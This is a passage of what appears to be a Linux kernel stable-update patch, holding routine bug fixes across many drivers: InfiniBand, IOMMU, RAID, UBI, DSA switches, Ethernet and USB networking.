+--- a/drivers/idle/intel_idle.c
++++ b/drivers/idle/intel_idle.c
+@@ -1430,6 +1430,7 @@ static const struct x86_cpu_id intel_idle_ids[] __initconst = {
+ 	X86_MATCH_INTEL_FAM6_MODEL(ALDERLAKE_L,		&idle_cpu_adl_l),
+ 	X86_MATCH_INTEL_FAM6_MODEL(ALDERLAKE_N,		&idle_cpu_adl_n),
+ 	X86_MATCH_INTEL_FAM6_MODEL(SAPPHIRERAPIDS_X,	&idle_cpu_spr),
++	X86_MATCH_INTEL_FAM6_MODEL(EMERALDRAPIDS_X,	&idle_cpu_spr),
+ 	X86_MATCH_INTEL_FAM6_MODEL(XEON_PHI_KNL,	&idle_cpu_knl),
+ 	X86_MATCH_INTEL_FAM6_MODEL(XEON_PHI_KNM,	&idle_cpu_knl),
+ 	X86_MATCH_INTEL_FAM6_MODEL(ATOM_GOLDMONT,	&idle_cpu_bxt),
+@@ -1862,6 +1863,7 @@ static void __init intel_idle_init_cstates_icpu(struct cpuidle_driver *drv)
+ 		skx_idle_state_table_update();
+ 		break;
+ 	case INTEL_FAM6_SAPPHIRERAPIDS_X:
++	case INTEL_FAM6_EMERALDRAPIDS_X:
+ 		spr_idle_state_table_update();
+ 		break;
+ 	case INTEL_FAM6_ALDERLAKE:
+diff --git a/drivers/infiniband/core/cma.c b/drivers/infiniband/core/cma.c
+index 4632b1833381a..0773ca7ace247 100644
+--- a/drivers/infiniband/core/cma.c
++++ b/drivers/infiniband/core/cma.c
+@@ -4936,7 +4936,7 @@ static int cma_iboe_join_multicast(struct rdma_id_private *id_priv,
+ 	int err = 0;
+ 	struct sockaddr *addr = (struct sockaddr *)&mc->addr;
+ 	struct net_device *ndev = NULL;
+-	struct ib_sa_multicast ib;
++	struct ib_sa_multicast ib = {};
+ 	enum ib_gid_type gid_type;
+ 	bool send_only;
+ 
+diff --git a/drivers/infiniband/core/cma_configfs.c b/drivers/infiniband/core/cma_configfs.c
+index 7b68b3ea979f7..f2fb2d8a65970 100644
+--- a/drivers/infiniband/core/cma_configfs.c
++++ b/drivers/infiniband/core/cma_configfs.c
+@@ -217,7 +217,7 @@ static int make_cma_ports(struct cma_dev_group *cma_dev_group,
+ 		return -ENOMEM;
+ 
+ 	for (i = 0; i < ports_num; i++) {
+-		char port_str[10];
++		char port_str[11];
+ 
+ 		ports[i].port_num = i + 1;
+ 		snprintf(port_str, sizeof(port_str), "%u", i + 1);
+diff --git a/drivers/infiniband/core/nldev.c b/drivers/infiniband/core/nldev.c
+index 222733a83ddb7..1adf20198afd1 100644
+--- a/drivers/infiniband/core/nldev.c
++++ b/drivers/infiniband/core/nldev.c
+@@ -2501,6 +2501,7 @@ static const struct rdma_nl_cbs nldev_cb_table[RDMA_NLDEV_NUM_OPS] = {
+ 	},
+ 	[RDMA_NLDEV_CMD_SYS_SET] = {
+ 		.doit = nldev_set_sys_set_doit,
++		.flags = RDMA_NL_ADMIN_PERM,
+ 	},
+ 	[RDMA_NLDEV_CMD_STAT_SET] = {
+ 		.doit = nldev_stat_set_doit,
+diff --git a/drivers/infiniband/core/uverbs_main.c b/drivers/infiniband/core/uverbs_main.c
+index fa937cd268219..6fe825800494c 100644
+--- a/drivers/infiniband/core/uverbs_main.c
++++ b/drivers/infiniband/core/uverbs_main.c
+@@ -535,7 +535,7 @@ static ssize_t verify_hdr(struct ib_uverbs_cmd_hdr *hdr,
+ 	if (hdr->in_words * 4 != count)
+ 		return -EINVAL;
+ 
+-	if (count < method_elm->req_size + sizeof(hdr)) {
++	if (count < method_elm->req_size + sizeof(*hdr)) {
+ 		/*
+ 		 * rdma-core v18 and v19 have a bug where they send DESTROY_CQ
+ 		 * with a 16 byte write instead of 24. Old kernels didn't
+diff --git a/drivers/infiniband/hw/mlx4/sysfs.c b/drivers/infiniband/hw/mlx4/sysfs.c
+index 24ee79aa2122e..88f534cf690e9 100644
+--- a/drivers/infiniband/hw/mlx4/sysfs.c
++++ b/drivers/infiniband/hw/mlx4/sysfs.c
+@@ -223,7 +223,7 @@ void del_sysfs_port_mcg_attr(struct mlx4_ib_dev *device, int port_num,
+ static int add_port_entries(struct mlx4_ib_dev *device, int port_num)
+ {
+ 	int i;
+-	char buff[11];
++	char buff[12];
+ 	struct mlx4_ib_iov_port *port = NULL;
+ 	int ret = 0 ;
+ 	struct ib_port_attr attr;
+diff --git a/drivers/infiniband/hw/mlx5/fs.c b/drivers/infiniband/hw/mlx5/fs.c
+index 5a13d902b0641..1022cebd0a46e 100644
+--- a/drivers/infiniband/hw/mlx5/fs.c
++++ b/drivers/infiniband/hw/mlx5/fs.c
+@@ -2471,8 +2471,8 @@ destroy_res:
+ 	mlx5_steering_anchor_destroy_res(ft_prio);
+ put_flow_table:
+ 	put_flow_table(dev, ft_prio, true);
+-	mutex_unlock(&dev->flow_db->lock);
+ free_obj:
++	mutex_unlock(&dev->flow_db->lock);
+ 	kfree(obj);
+ 
+ 	return err;
+diff --git a/drivers/infiniband/hw/mlx5/main.c b/drivers/infiniband/hw/mlx5/main.c
+index 3178df55c4d85..0baf3b5518b46 100644
+--- a/drivers/infiniband/hw/mlx5/main.c
++++ b/drivers/infiniband/hw/mlx5/main.c
+@@ -2074,7 +2074,7 @@ static inline char *mmap_cmd2str(enum mlx5_ib_mmap_cmd cmd)
+ 	case MLX5_IB_MMAP_DEVICE_MEM:
+ 		return "Device Memory";
+ 	default:
+-		return NULL;
++		return "Unknown";
+ 	}
+ }
+ 
+diff --git a/drivers/infiniband/sw/siw/siw_cm.c b/drivers/infiniband/sw/siw/siw_cm.c
+index 552d8271e423b..dc679c34ceefa 100644
+--- a/drivers/infiniband/sw/siw/siw_cm.c
++++ b/drivers/infiniband/sw/siw/siw_cm.c
+@@ -973,6 +973,7 @@ static void siw_accept_newconn(struct siw_cep *cep)
+ 			siw_cep_put(cep);
+ 			new_cep->listen_cep = NULL;
+ 			if (rv) {
++				siw_cancel_mpatimer(new_cep);
+ 				siw_cep_set_free(new_cep);
+ 				goto error;
+ 			}
+@@ -1097,9 +1098,12 @@ static void siw_cm_work_handler(struct work_struct *w)
+ 				/*
+ 				 * Socket close before MPA request received.
+ 				 */
+-				siw_dbg_cep(cep, "no mpareq: drop listener\n");
+-				siw_cep_put(cep->listen_cep);
+-				cep->listen_cep = NULL;
++				if (cep->listen_cep) {
++					siw_dbg_cep(cep,
++						"no mpareq: drop listener\n");
++					siw_cep_put(cep->listen_cep);
++					cep->listen_cep = NULL;
++				}
+ 			}
+ 		}
+ 		release_cep = 1;
+@@ -1222,7 +1226,11 @@ static void siw_cm_llp_data_ready(struct sock *sk)
+ 	if (!cep)
+ 		goto out;
+ 
+-	siw_dbg_cep(cep, "state: %d\n", cep->state);
++	siw_dbg_cep(cep, "cep state: %d, socket state %d\n",
++		    cep->state, sk->sk_state);
++
++	if (sk->sk_state != TCP_ESTABLISHED)
++		goto out;
+ 
+ 	switch (cep->state) {
+ 	case SIW_EPSTATE_RDMA_MODE:
+diff --git a/drivers/infiniband/ulp/srp/ib_srp.c b/drivers/infiniband/ulp/srp/ib_srp.c
+index a7580c4855fec..c4dcef76e9646 100644
+--- a/drivers/infiniband/ulp/srp/ib_srp.c
++++ b/drivers/infiniband/ulp/srp/ib_srp.c
+@@ -2789,7 +2789,6 @@ static int srp_abort(struct scsi_cmnd *scmnd)
+ 	u32 tag;
+ 	u16 ch_idx;
+ 	struct srp_rdma_ch *ch;
+-	int ret;
+ 
+ 	shost_printk(KERN_ERR, target->scsi_host, "SRP abort called\n");
+ 
+@@ -2803,19 +2802,14 @@ static int srp_abort(struct scsi_cmnd *scmnd)
+ 	shost_printk(KERN_ERR, target->scsi_host,
+ 		     "Sending SRP abort for tag %#x\n", tag);
+ 	if (srp_send_tsk_mgmt(ch, tag, scmnd->device->lun,
+-			      SRP_TSK_ABORT_TASK, NULL) == 0)
+-		ret = SUCCESS;
+-	else if (target->rport->state == SRP_RPORT_LOST)
+-		ret = FAST_IO_FAIL;
+-	else
+-		ret = FAILED;
+-	if (ret == SUCCESS) {
++			      SRP_TSK_ABORT_TASK, NULL) == 0) {
+ 		srp_free_req(ch, req, scmnd, 0);
+-		scmnd->result = DID_ABORT << 16;
+-		scsi_done(scmnd);
++		return SUCCESS;
+ 	}
++	if (target->rport->state == SRP_RPORT_LOST)
++		return FAST_IO_FAIL;
+ 
+-	return ret;
++	return FAILED;
+ }
+ 
+ static int srp_reset_device(struct scsi_cmnd *scmnd)
+diff --git a/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c b/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c
+index db33dc87f69ed..8966f7d5aab61 100644
+--- a/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c
++++ b/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c
+@@ -1886,13 +1886,23 @@ static void __arm_smmu_tlb_inv_range(struct arm_smmu_cmdq_ent *cmd,
+ 		/* Get the leaf page size */
+ 		tg = __ffs(smmu_domain->domain.pgsize_bitmap);
+ 
++		num_pages = size >> tg;
++
+ 		/* Convert page size of 12,14,16 (log2) to 1,2,3 */
+ 		cmd->tlbi.tg = (tg - 10) / 2;
+ 
+-		/* Determine what level the granule is at */
+-		cmd->tlbi.ttl = 4 - ((ilog2(granule) - 3) / (tg - 3));
+-
+-		num_pages = size >> tg;
++		/*
++		 * Determine what level the granule is at. For non-leaf, both
++		 * io-pgtable and SVA pass a nominal last-level granule because
++		 * they don't know what level(s) actually apply, so ignore that
++		 * and leave TTL=0. However for various errata reasons we still
++		 * want to use a range command, so avoid the SVA corner case
++		 * where both scale and num could be 0 as well.
++		 */
++		if (cmd->tlbi.leaf)
++			cmd->tlbi.ttl = 4 - ((ilog2(granule) - 3) / (tg - 3));
++		else if ((num_pages & CMDQ_TLBI_RANGE_NUM_MAX) == 1)
++			num_pages++;
+ 	}
+ 
+ 	cmds.num = 0;
+diff --git a/drivers/iommu/intel/iommu.c b/drivers/iommu/intel/iommu.c
+index d4b5d20bd6dda..5c4f5aa8e87e4 100644
+--- a/drivers/iommu/intel/iommu.c
++++ b/drivers/iommu/intel/iommu.c
+@@ -3163,13 +3163,6 @@ static int iommu_suspend(void)
+ 	struct intel_iommu *iommu = NULL;
+ 	unsigned long flag;
+ 
+-	for_each_active_iommu(iommu, drhd) {
+-		iommu->iommu_state = kcalloc(MAX_SR_DMAR_REGS, sizeof(u32),
+-					     GFP_KERNEL);
+-		if (!iommu->iommu_state)
+-			goto nomem;
+-	}
+-
+ 	iommu_flush_all();
+ 
+ 	for_each_active_iommu(iommu, drhd) {
+@@ -3189,12 +3182,6 @@ static int iommu_suspend(void)
+ 		raw_spin_unlock_irqrestore(&iommu->register_lock, flag);
+ 	}
+ 	return 0;
+-
+-nomem:
+-	for_each_active_iommu(iommu, drhd)
+-		kfree(iommu->iommu_state);
+-
+-	return -ENOMEM;
+ }
+ 
+ static void iommu_resume(void)
+@@ -3226,9 +3213,6 @@ static void iommu_resume(void)
+ 
+ 		raw_spin_unlock_irqrestore(&iommu->register_lock, flag);
+ 	}
+-
+-	for_each_active_iommu(iommu, drhd)
+-		kfree(iommu->iommu_state);
+ }
+ 
+ static struct syscore_ops iommu_syscore_ops = {
+diff --git a/drivers/iommu/intel/iommu.h b/drivers/iommu/intel/iommu.h
+index db9df7c3790cd..c99cb715bd9a2 100644
+--- a/drivers/iommu/intel/iommu.h
++++ b/drivers/iommu/intel/iommu.h
+@@ -595,7 +595,7 @@ struct intel_iommu {
+ 	struct iopf_queue *iopf_queue;
+ 	unsigned char iopfq_name[16];
+ 	struct q_inval  *qi;            /* Queued invalidation info */
+-	u32 *iommu_state; /* Store iommu states between suspend and resume.*/
++	u32 iommu_state[MAX_SR_DMAR_REGS]; /* Store iommu states between suspend and resume.*/
+ 
+ #ifdef CONFIG_IRQ_REMAP
+ 	struct ir_table *ir_table;	/* Interrupt remapping info */
+diff --git a/drivers/iommu/mtk_iommu.c b/drivers/iommu/mtk_iommu.c
+index 9673cd60c84fc..0ba2a63a9538a 100644
+--- a/drivers/iommu/mtk_iommu.c
++++ b/drivers/iommu/mtk_iommu.c
+@@ -223,7 +223,7 @@ struct mtk_iommu_data {
+ 	struct device			*smicomm_dev;
+ 
+ 	struct mtk_iommu_bank_data	*bank;
+-	struct mtk_iommu_domain		*share_dom; /* For 2 HWs share pgtable */
++	struct mtk_iommu_domain		*share_dom;
+ 
+ 	struct regmap			*pericfg;
+ 	struct mutex			mutex; /* Protect m4u_group/m4u_dom above */
+@@ -579,8 +579,8 @@ static int mtk_iommu_domain_finalise(struct mtk_iommu_domain *dom,
+ 	struct mtk_iommu_domain	*share_dom = data->share_dom;
+ 	const struct mtk_iommu_iova_region *region;
+ 
+-	/* Always use share domain in sharing pgtable case */
+-	if (MTK_IOMMU_HAS_FLAG(data->plat_data, SHARE_PGTABLE) && share_dom) {
++	/* Share pgtable when 2 MM IOMMU share the pgtable or one IOMMU use multiple iova ranges */
++	if (share_dom) {
+ 		dom->iop = share_dom->iop;
+ 		dom->cfg = share_dom->cfg;
+ 		dom->domain.pgsize_bitmap = share_dom->cfg.pgsize_bitmap;
+@@ -613,8 +613,7 @@ static int mtk_iommu_domain_finalise(struct mtk_iommu_domain *dom,
+ 	/* Update our support page sizes bitmap */
+ 	dom->domain.pgsize_bitmap = dom->cfg.pgsize_bitmap;
+ 
+-	if (MTK_IOMMU_HAS_FLAG(data->plat_data, SHARE_PGTABLE))
+-		data->share_dom = dom;
++	data->share_dom = dom;
+ 
+ update_iova_region:
+ 	/* Update the iova region for this domain */
+diff --git a/drivers/leds/led-core.c b/drivers/leds/led-core.c
+index aad8bc44459fe..d94d60b526461 100644
+--- a/drivers/leds/led-core.c
++++ b/drivers/leds/led-core.c
+@@ -424,10 +424,6 @@ int led_compose_name(struct device *dev, struct led_init_data *init_data,
+ 
+ 	led_parse_fwnode_props(dev, fwnode, &props);
+ 
+-	/* We want to label LEDs that can produce full range of colors
+-	 * as RGB, not multicolor */
+-	BUG_ON(props.color == LED_COLOR_ID_MULTI);
+-
+ 	if (props.label) {
+ 		/*
+ 		 * If init_data.devicename is NULL, then it indicates that
+diff --git a/drivers/md/dm-zoned-target.c b/drivers/md/dm-zoned-target.c
+index 95b132b52f332..4abe1e2f8ad81 100644
+--- a/drivers/md/dm-zoned-target.c
++++ b/drivers/md/dm-zoned-target.c
+@@ -748,17 +748,16 @@ err:
+ /*
+  * Cleanup zoned device information.
+  */
+-static void dmz_put_zoned_device(struct dm_target *ti)
++static void dmz_put_zoned_devices(struct dm_target *ti)
+ {
+ 	struct dmz_target *dmz = ti->private;
+ 	int i;
+ 
+-	for (i = 0; i < dmz->nr_ddevs; i++) {
+-		if (dmz->ddev[i]) {
++	for (i = 0; i < dmz->nr_ddevs; i++)
++		if (dmz->ddev[i])
+ 			dm_put_device(ti, dmz->ddev[i]);
+-			dmz->ddev[i] = NULL;
+-		}
+-	}
++
++	kfree(dmz->ddev);
+ }
+ 
+ static int dmz_fixup_devices(struct dm_target *ti)
+@@ -948,7 +947,7 @@ err_bio:
+ err_meta:
+ 	dmz_dtr_metadata(dmz->metadata);
+ err_dev:
+-	dmz_put_zoned_device(ti);
++	dmz_put_zoned_devices(ti);
+ err:
+ 	kfree(dmz->dev);
+ 	kfree(dmz);
+@@ -978,7 +977,7 @@ static void dmz_dtr(struct dm_target *ti)
+ 
+ 	bioset_exit(&dmz->bio_set);
+ 
+-	dmz_put_zoned_device(ti);
++	dmz_put_zoned_devices(ti);
+ 
+ 	mutex_destroy(&dmz->chunk_lock);
+ 
+diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c
+index fbef3c9badb65..98d4e93efa31c 100644
+--- a/drivers/md/raid5.c
++++ b/drivers/md/raid5.c
+@@ -854,6 +854,13 @@ struct stripe_head *raid5_get_active_stripe(struct r5conf *conf,
+ 
+ 		set_bit(R5_INACTIVE_BLOCKED, &conf->cache_state);
+ 		r5l_wake_reclaim(conf->log, 0);
++
++		/* release batch_last before wait to avoid risk of deadlock */
++		if (ctx && ctx->batch_last) {
++			raid5_release_stripe(ctx->batch_last);
++			ctx->batch_last = NULL;
++		}
++
+ 		wait_event_lock_irq(conf->wait_for_stripe,
+ 				    is_inactive_blocked(conf, hash),
+ 				    *(conf->hash_locks + hash));
+diff --git a/drivers/mtd/ubi/build.c b/drivers/mtd/ubi/build.c
+index 1662c12e24ada..6fbd77dc1d18f 100644
+--- a/drivers/mtd/ubi/build.c
++++ b/drivers/mtd/ubi/build.c
+@@ -893,6 +893,13 @@ int ubi_attach_mtd_dev(struct mtd_info *mtd, int ubi_num,
+ 		return -EINVAL;
+ 	}
+ 
++	/* UBI cannot work on flashes with zero erasesize. */
++	if (!mtd->erasesize) {
++		pr_err("ubi: refuse attaching mtd%d - zero erasesize flash is not supported\n",
++			mtd->index);
++		return -EINVAL;
++	}
++
+ 	if (ubi_num == UBI_DEV_NUM_AUTO) {
+ 		/* Search for an empty slot in the @ubi_devices array */
+ 		for (ubi_num = 0; ubi_num < UBI_MAX_DEVICES; ubi_num++)
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index a73008b9e0b3c..ba906dfab055c 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -3012,14 +3012,16 @@ static void mv88e6xxx_hardware_reset(struct mv88e6xxx_chip *chip)
+ 		 * from the wrong location resulting in the switch booting
+ 		 * to wrong mode and inoperable.
+ 		 */
+-		mv88e6xxx_g1_wait_eeprom_done(chip);
++		if (chip->info->ops->get_eeprom)
++			mv88e6xxx_g2_eeprom_wait(chip);
+ 
+ 		gpiod_set_value_cansleep(gpiod, 1);
+ 		usleep_range(10000, 20000);
+ 		gpiod_set_value_cansleep(gpiod, 0);
+ 		usleep_range(10000, 20000);
+ 
+-		mv88e6xxx_g1_wait_eeprom_done(chip);
++		if (chip->info->ops->get_eeprom)
++			mv88e6xxx_g2_eeprom_wait(chip);
+ 	}
+ }
+ 
+diff --git a/drivers/net/dsa/mv88e6xxx/global1.c b/drivers/net/dsa/mv88e6xxx/global1.c
+index 5848112036b08..964928285782c 100644
+--- a/drivers/net/dsa/mv88e6xxx/global1.c
++++ b/drivers/net/dsa/mv88e6xxx/global1.c
+@@ -75,37 +75,6 @@ static int mv88e6xxx_g1_wait_init_ready(struct mv88e6xxx_chip *chip)
+ 	return mv88e6xxx_g1_wait_bit(chip, MV88E6XXX_G1_STS, bit, 1);
+ }
+ 
+-void mv88e6xxx_g1_wait_eeprom_done(struct mv88e6xxx_chip *chip)
+-{
+-	const unsigned long timeout = jiffies + 1 * HZ;
+-	u16 val;
+-	int err;
+-
+-	/* Wait up to 1 second for the switch to finish reading the
+-	 * EEPROM.
+-	 */
+-	while (time_before(jiffies, timeout)) {
+-		err = mv88e6xxx_g1_read(chip, MV88E6XXX_G1_STS, &val);
+-		if (err) {
+-			dev_err(chip->dev, "Error reading status");
+-			return;
+-		}
+-
+-		/* If the switch is still resetting, it may not
+-		 * respond on the bus, and so MDIO read returns
+-		 * 0xffff. Differentiate between that, and waiting for
+-		 * the EEPROM to be done by bit 0 being set.
+-		 */
+-		if (val != 0xffff &&
+-		    val & BIT(MV88E6XXX_G1_STS_IRQ_EEPROM_DONE))
+-			return;
+-
+-		usleep_range(1000, 2000);
+-	}
+-
+-	dev_err(chip->dev, "Timeout waiting for EEPROM done");
+-}
+-
+ /* Offset 0x01: Switch MAC Address Register Bytes 0 & 1
+  * Offset 0x02: Switch MAC Address Register Bytes 2 & 3
+  * Offset 0x03: Switch MAC Address Register Bytes 4 & 5
+diff --git a/drivers/net/dsa/mv88e6xxx/global1.h b/drivers/net/dsa/mv88e6xxx/global1.h
+index 65958b2a0d3a3..04b57a21f7868 100644
+--- a/drivers/net/dsa/mv88e6xxx/global1.h
++++ b/drivers/net/dsa/mv88e6xxx/global1.h
+@@ -281,7 +281,6 @@ int mv88e6xxx_g1_set_switch_mac(struct mv88e6xxx_chip *chip, u8 *addr);
+ int mv88e6185_g1_reset(struct mv88e6xxx_chip *chip);
+ int mv88e6352_g1_reset(struct mv88e6xxx_chip *chip);
+ int mv88e6250_g1_reset(struct mv88e6xxx_chip *chip);
+-void mv88e6xxx_g1_wait_eeprom_done(struct mv88e6xxx_chip *chip);
+ 
+ int mv88e6185_g1_ppu_enable(struct mv88e6xxx_chip *chip);
+ int mv88e6185_g1_ppu_disable(struct mv88e6xxx_chip *chip);
+diff --git a/drivers/net/dsa/mv88e6xxx/global2.c b/drivers/net/dsa/mv88e6xxx/global2.c
+index ec49939968fac..ac302a935ce69 100644
+--- a/drivers/net/dsa/mv88e6xxx/global2.c
++++ b/drivers/net/dsa/mv88e6xxx/global2.c
+@@ -340,7 +340,7 @@ int mv88e6xxx_g2_pot_clear(struct mv88e6xxx_chip *chip)
+  * Offset 0x15: EEPROM Addr (for 8-bit data access)
+  */
+ 
+-static int mv88e6xxx_g2_eeprom_wait(struct mv88e6xxx_chip *chip)
++int mv88e6xxx_g2_eeprom_wait(struct mv88e6xxx_chip *chip)
+ {
+ 	int bit = __bf_shf(MV88E6XXX_G2_EEPROM_CMD_BUSY);
+ 	int err;
+diff --git a/drivers/net/dsa/mv88e6xxx/global2.h b/drivers/net/dsa/mv88e6xxx/global2.h
+index c05fad5c9f19d..751a6c988de42 100644
+--- a/drivers/net/dsa/mv88e6xxx/global2.h
++++ b/drivers/net/dsa/mv88e6xxx/global2.h
+@@ -359,6 +359,7 @@ int mv88e6xxx_g2_trunk_clear(struct mv88e6xxx_chip *chip);
+ 
+ int mv88e6xxx_g2_device_mapping_write(struct mv88e6xxx_chip *chip, int target,
+ 				      int port);
++int mv88e6xxx_g2_eeprom_wait(struct mv88e6xxx_chip *chip);
+ 
+ extern const struct mv88e6xxx_irq_ops mv88e6097_watchdog_ops;
+ extern const struct mv88e6xxx_irq_ops mv88e6250_watchdog_ops;
+diff --git a/drivers/net/ethernet/ibm/ibmveth.c b/drivers/net/ethernet/ibm/ibmveth.c
+index 0b4ec6e41eb41..1d21a281222d9 100644
+--- a/drivers/net/ethernet/ibm/ibmveth.c
++++ b/drivers/net/ethernet/ibm/ibmveth.c
+@@ -1308,24 +1308,23 @@ static void ibmveth_rx_csum_helper(struct sk_buff *skb,
+ 	 * the user space for finding a flow. During this process, OVS computes
+ 	 * checksum on the first packet when CHECKSUM_PARTIAL flag is set.
+ 	 *
+-	 * So, re-compute TCP pseudo header checksum when configured for
+-	 * trunk mode.
++	 * So, re-compute TCP pseudo header checksum.
+ 	 */
++
+ 	if (iph_proto == IPPROTO_TCP) {
+ 		struct tcphdr *tcph = (struct tcphdr *)(skb->data + iphlen);
++
+ 		if (tcph->check == 0x0000) {
+ 			/* Recompute TCP pseudo header checksum  */
+-			if (adapter->is_active_trunk) {
+-				tcphdrlen = skb->len - iphlen;
+-				if (skb_proto == ETH_P_IP)
+-					tcph->check =
+-					 ~csum_tcpudp_magic(iph->saddr,
+-					iph->daddr, tcphdrlen, iph_proto, 0);
+-				else if (skb_proto == ETH_P_IPV6)
+-					tcph->check =
+-					 ~csum_ipv6_magic(&iph6->saddr,
+-					&iph6->daddr, tcphdrlen, iph_proto, 0);
+-			}
++			tcphdrlen = skb->len - iphlen;
++			if (skb_proto == ETH_P_IP)
++				tcph->check =
++				 ~csum_tcpudp_magic(iph->saddr,
++				iph->daddr, tcphdrlen, iph_proto, 0);
++			else if (skb_proto == ETH_P_IPV6)
++				tcph->check =
++				 ~csum_ipv6_magic(&iph6->saddr,
++				&iph6->daddr, tcphdrlen, iph_proto, 0);
+ 			/* Setup SKB fields for checksum offload */
+ 			skb_partial_csum_set(skb, iphlen,
+ 					     offsetof(struct tcphdr, check));
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_ptp.c b/drivers/net/ethernet/intel/i40e/i40e_ptp.c
+index ffea0c9c82f1e..97a9efe7b713e 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_ptp.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_ptp.c
+@@ -361,9 +361,9 @@ static int i40e_ptp_adjfine(struct ptp_clock_info *ptp, long scaled_ppm)
+ 				   1000000ULL << 16);
+ 
+ 	if (neg_adj)
+-		adj = I40E_PTP_40GB_INCVAL - diff;
++		adj = freq - diff;
+ 	else
+-		adj = I40E_PTP_40GB_INCVAL + diff;
++		adj = freq + diff;
+ 
+ 	wr32(hw, I40E_PRTTSYN_INC_L, adj & 0xFFFFFFFF);
+ 	wr32(hw, I40E_PRTTSYN_INC_H, adj >> 32);
+diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.c b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+index 0ac5ae16308f6..17e6ac4445afc 100644
+--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.c
++++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+@@ -2862,8 +2862,8 @@ static irqreturn_t mtk_handle_irq_rx(int irq, void *_eth)
+ 
+ 	eth->rx_events++;
+ 	if (likely(napi_schedule_prep(&eth->rx_napi))) {
+-		__napi_schedule(&eth->rx_napi);
+ 		mtk_rx_irq_disable(eth, eth->soc->txrx.rx_irq_done_mask);
++		__napi_schedule(&eth->rx_napi);
+ 	}
+ 
+ 	return IRQ_HANDLED;
+@@ -2875,8 +2875,8 @@ static irqreturn_t mtk_handle_irq_tx(int irq, void *_eth)
+ 
+ 	eth->tx_events++;
+ 	if (likely(napi_schedule_prep(&eth->tx_napi))) {
+-		__napi_schedule(&eth->tx_napi);
+ 		mtk_tx_irq_disable(eth, MTK_TX_DONE_INT);
++		__napi_schedule(&eth->tx_napi);
+ 	}
+ 
+ 	return IRQ_HANDLED;
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_ll2.h b/drivers/net/ethernet/qlogic/qed/qed_ll2.h
+index 0bfc375161ed6..a174c6fc626ac 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_ll2.h
++++ b/drivers/net/ethernet/qlogic/qed/qed_ll2.h
+@@ -110,9 +110,9 @@ struct qed_ll2_info {
+ 	enum core_tx_dest tx_dest;
+ 	u8 tx_stats_en;
+ 	bool main_func_queue;
++	struct qed_ll2_cbs cbs;
+ 	struct qed_ll2_rx_queue rx_queue;
+ 	struct qed_ll2_tx_queue tx_queue;
+-	struct qed_ll2_cbs cbs;
+ };
+ 
+ extern const struct qed_ll2_ops qed_ll2_ops_pass;
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac-stm32.c b/drivers/net/ethernet/stmicro/stmmac/dwmac-stm32.c
+index 2b38a499a4045..533f5245ad945 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac-stm32.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac-stm32.c
+@@ -105,6 +105,7 @@ struct stm32_ops {
+ 	int (*parse_data)(struct stm32_dwmac *dwmac,
+ 			  struct device *dev);
+ 	u32 syscfg_eth_mask;
++	bool clk_rx_enable_in_suspend;
+ };
+ 
+ static int stm32_dwmac_init(struct plat_stmmacenet_data *plat_dat)
+@@ -122,7 +123,8 @@ static int stm32_dwmac_init(struct plat_stmmacenet_data *plat_dat)
+ 	if (ret)
+ 		return ret;
+ 
+-	if (!dwmac->dev->power.is_suspended) {
++	if (!dwmac->ops->clk_rx_enable_in_suspend ||
++	    !dwmac->dev->power.is_suspended) {
+ 		ret = clk_prepare_enable(dwmac->clk_rx);
+ 		if (ret) {
+ 			clk_disable_unprepare(dwmac->clk_tx);
+@@ -515,7 +517,8 @@ static struct stm32_ops stm32mp1_dwmac_data = {
+ 	.suspend = stm32mp1_suspend,
+ 	.resume = stm32mp1_resume,
+ 	.parse_data = stm32mp1_parse_data,
+-	.syscfg_eth_mask = SYSCFG_MP1_ETH_MASK
++	.syscfg_eth_mask = SYSCFG_MP1_ETH_MASK,
++	.clk_rx_enable_in_suspend = true
+ };
+ 
+ static const struct of_device_id stm32_dwmac_match[] = {
+diff --git a/drivers/net/ethernet/ti/am65-cpsw-nuss.c b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+index 25466cbdc16bd..9f2553799895d 100644
+--- a/drivers/net/ethernet/ti/am65-cpsw-nuss.c
++++ b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+@@ -1614,6 +1614,7 @@ static int am65_cpsw_nuss_init_tx_chns(struct am65_cpsw_common *common)
+ 		if (tx_chn->irq <= 0) {
+ 			dev_err(dev, "Failed to get tx dma irq %d\n",
+ 				tx_chn->irq);
++			ret = tx_chn->irq ?: -ENXIO;
+ 			goto err;
+ 		}
+ 
+diff --git a/drivers/net/usb/smsc75xx.c b/drivers/net/usb/smsc75xx.c
+index 5d6454fedb3f1..78ad2da3ee29b 100644
+--- a/drivers/net/usb/smsc75xx.c
++++ b/drivers/net/usb/smsc75xx.c
+@@ -90,7 +90,9 @@ static int __must_check __smsc75xx_read_reg(struct usbnet *dev, u32 index,
+ 	ret = fn(dev, USB_VENDOR_REQUEST_READ_REGISTER, USB_DIR_IN
+ 		 | USB_TYPE_VENDOR | USB_RECIP_DEVICE,
+ 		 0, index, &buf, 4);
+-	if (unlikely(ret < 0)) {
++	if (unlikely(ret < 4)) {
++		ret = ret < 0 ? ret : -ENODATA;
++
+ 		netdev_warn(dev->net, "Failed to read reg index 0x%08x: %d\n",
+ 			    index, ret);
+ 		return ret;
+diff --git a/drivers/net/vrf.c b/drivers/net/vrf.c
+index f6dcec66f0a4b..208df4d419395 100644
+--- a/drivers/net/vrf.c
++++ b/drivers/net/vrf.c
+@@ -664,7 +664,7 @@ static int vrf_finish_output6(struct net *net, struct sock *sk,
+ 	skb->protocol = htons(ETH_P_IPV6);
+ 	skb->dev = dev;
+ 
